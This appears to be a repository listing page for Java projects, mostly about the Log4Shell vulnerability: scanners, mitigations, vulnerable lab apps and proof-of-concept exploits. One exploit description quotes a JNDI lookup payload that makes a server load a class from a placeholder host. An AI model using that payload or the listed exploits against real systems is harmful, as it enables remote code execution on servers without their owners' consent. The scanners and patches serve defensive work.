25 Repositories
Java log4shell-tester Libraries
Log4J scanner that detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046, etc) on your file-system within any application. It is able to even find Log4J instances that are hidden several layers deep. Works on Linux, Windows, and Mac, and everywhere else Java runs, too!
Log4-detector Scanner that detects vulnerable Log4J versions to help teams assess their exposure to CVE-2021-44228 (CRITICAL), CVE-2021-45046, CVE-202
log4j2 remote code execution or IP leakage exploit (with examples)
log4j2-exploits 2021-12-11.12-17-44.mp4 This fundamental vulnerability was reported by CVE-2018-3149 and patched by this article. (8u121 Release Notes
Local Bytecode Scanner for the Log4JShell Vulnerability (CVE-2021-44228)
🔍 Log4JShell Bytecode Detector Log4jShell Bytecode Detector is an open source tool that helps identify if a jar file is affected by the critical CVE-
A mitigation for CVE-2021-44228 (log4shell) that works by patching the vulnerability at runtime. (Works with any vulnerable java software, tested with java 6 and newer)
Log4jPatcher A Java Agent based mitigation for Log4j2 JNDI exploits. This agent employs 2 patches: Disabling all Lookup conversions (on supported Log4
PCRE RegEx matching Log4Shell CVE-2021-44228 IOC in your logs
Log4Shell-Rex The following RegEx was written in an attempt to match indicators of a Log4Shell (CVE-2021-44228 and CVE-2021-45046) exploitation. If yo
A Basic Java Application Vulnerable to the Log4Shell RCE
This is a basic, minimal, intentionally vulnerable Java web application including a version (2.14.1) of the log4j library affected by the infamous log4shell (CVE-2021-44228) vulnerability.
Contains all my research and content produced regarding the log4shell vulnerability
Objective Contains all my research and content produced regarding the log4shell vulnerability. Content Folder "analysis" Contain the information that
Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell.
Log4Shell sample vulnerable application (CVE-2021-44228) This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, nickname
Log4Shell Zero-Day Exploit Proof of Concept
Log4Shell Zero-Day Exploit if attacker manage to log this string ${jndi:ldap://someaddresshere/param1=value1} to log4j it somehow loads the class/java
An LDAP RCE exploit for CVE-2021-44228 Log4Shell
log4j-poc An LDAP RCE exploit for CVE-2021-44228 Log4Shell Description The demo Tomcat 8 server on port 8080 has a vulnerable app (log4shell) deployed
Disables JNDI lookup globally using Java agent instrumentation, mitigation for Log4Shell attacks.
NoJNDI This is a simple proof of concept agent that disables JNDI lookups globally across the JVM. This is useful for mitigating the Log4Shell attack,
Log4Shell RCE exploit using a gadget class. Not dependent on an old JDK version to work.
Log4Shell RCE exploit using a gadget class. Not dependent on an old JDK version to work.
CVE-2021-44228 (Log4Shell) Proof of Concept
CVE-2021-44228 (Log4Shell) Proof of Concept Apache Log4j2 =2.14.1 JNDI features used in configuration, log messages, and parameters do not protect ag
Log4Shell sample vulnerable application (CVE-2021-44228)
Log4Shell sample vulnerable application (CVE-2021-44228)
Java testing framework for testing pojo methods
Java testing framework for testing pojo methods. It tests equals, hashCode, toString, getters, setters, constructors and whatever you report in issues ;)
Logout4Shell - Use Log4Shell vulnerability to vaccinate a victim server against Log4Shell
Logout4Shell Description A vulnerability impacting Apache Log4j versions 2.0 through 2.14.1 was disclosed on the project’s Github on December 9, 2021.
Huntress Log4Shell Testing Application
Huntress Log4Shell Testing Application This repo holds the source for the HTTP and LDAP servers hosted here. Both services are hosted under one Java a
Log4shell-hunter - Scanner that scans local files for log4shell vulnerability
Log4shell-hunter - Scanner that scans local files for log4shell vulnerability. Does bytecode analysis so it does not rely on metadata. Will find vulnerable log4j even it has been self-compiled/repackaged/shaded/nested (e.g. uberjar, fatjar) and even obfuscated.
Test case to check if the Log4Shell/CVE-2021-44228 hotfix will raise any unexpected exceptions
Log4Shell Hotfix Side Effect Test Case I wanted to know if any ClassNotFoundException or similar unexpected exception is raised when one applies the C
Log4shell docker lab using christophetd's vulnerable app and mbechler's marshalsec
log4shell-dockerlab Credits All credits goes to the original authors. I just git-cloned and created a docker-compose file, that's all. LunaSec - log4s
Log4J CVE-2021-44228 Minecraft PoC
CVE-2021-44228 in Minecraft Java 16 Paper server build #397 Minecraft 1.17.1 Exploitation In Java 16 only deserialization attacks work by default usin
Small example repo for looking into log4j CVE-2021-44228
log4j CVE-2021-44228 Lame useless repo to look into log4j CVE-2021-44228. Setup The repository contains a .idea/ folder which is a IntelliJ IDEA proje
log4j2 Log4Shell CVE-2021-44228 proof of concept
Log4Shell CVE-2021-44228 proof of concept Requirement Java (JDK/JRE) 8 or later version curl exploitable Simple spring boot application that serves a
Um projeto simples usando Serenity BDD desenvolvido para testes backend.
🚧 EM CONSTRUÇÂO 🚧 Um pouco sobre Serenity e o projeto desenvolvido Serenity_BDD é uma biblioteca de código aberto que visa tornar a ideia de documen
Um projeto simples usando Serenity BDD desenvolvido para testes backend.
🚧 EM CONSTRUÇÂO 🚧 Um pouco sobre Serenity e o projeto desenvolvido Serenity_BDD é uma biblioteca de código aberto que visa tornar a ideia de documen